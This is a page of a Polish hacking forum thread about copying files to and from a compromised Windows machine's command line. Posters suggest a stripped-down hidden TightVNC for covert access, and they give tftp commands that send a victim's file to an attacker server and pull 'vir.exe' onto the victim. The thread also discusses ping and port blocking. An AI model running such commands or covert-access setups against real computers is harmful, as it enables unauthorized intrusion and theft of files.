Strona 2 z 2 PierwszyPierwszy 12
Pokaż wyniki 11 do 13 z 13

Temat: kopiowanie plikow cmd - netCat

Domyślnie

jbc to instalujesz np. przerobione przez siebie zalozmy.. TightVNC... troche pogrzebiesz w kodzie i wywalisz gui i inne pie******

Domyślnie

Nic z tego nie wiem, bo tak piszesz, jesli jesteś w sieci z atakowanym kompem i masz dostęp do jego cmd to stawiasz na swoim kompie serwer tftp i przesyłasz pliki za pomoca polecenia tftp.
    np. tftp -i 192.168.0.666 put c:\zdjecie.jpg zdjecie.jpg //wysyła
    tftp -i 192.168.0.666 get vir.exe c:\vir.exe //pobiera
    Istnieje jeszcze klient ftp pod cmd, wtedy możesz wysłać plik na dowolny server
    ftp, nie kożystałem, ale to ci może pomóc: http://groups.google.pl/group/alt.pl...0275e12052526c

Domyślnie

Cytat Napisał mayhem Zobacz post
    Ale do sedna - jest komp prywatny. Na nim siedzi avast i chyba zaden firewall. Jednak tego pewien nie jestem gdyz komp nie oddaje odp na ping, a skanowanie portow nie daje praktycznie nic. W celach cwiczeniowych podobna konfiguracje walnalem na swoj 2gi komp i zachowuje sie on z deka inaczej (np odpowiada na pingi), wiec cos chyba przeoczylem..
    Jeśli chodzi o tą kwestię to komp ma wyłączone echo ICMP jeśli nie odpowiada na ping - można to ustawić w firewallu. Niektóre servery mają to wyłączone bo wtedy są niejako niewidzialne przez niektóre "zagrania" internautów. Niejako zwiększa to bezpiecz3ństwo.

A co oznacza, że skanowanie portów nic nie daje na hoście ? może ma przyblokowane wszytkie porty ? Znam takie sytuacje. Host jest włączony do sieci i odblok portu następuje tylko wtedy kiedy chce skorzystać z zasobów - i to manualnie. To również zwiększa bezpieczeństwo, ale również jest szansa na włam - ale już dużo mniejsza bo w zasadzie jest tylko jedna usługa do skillowania- fw.

Strona 2 z 2 PierwszyPierwszy 12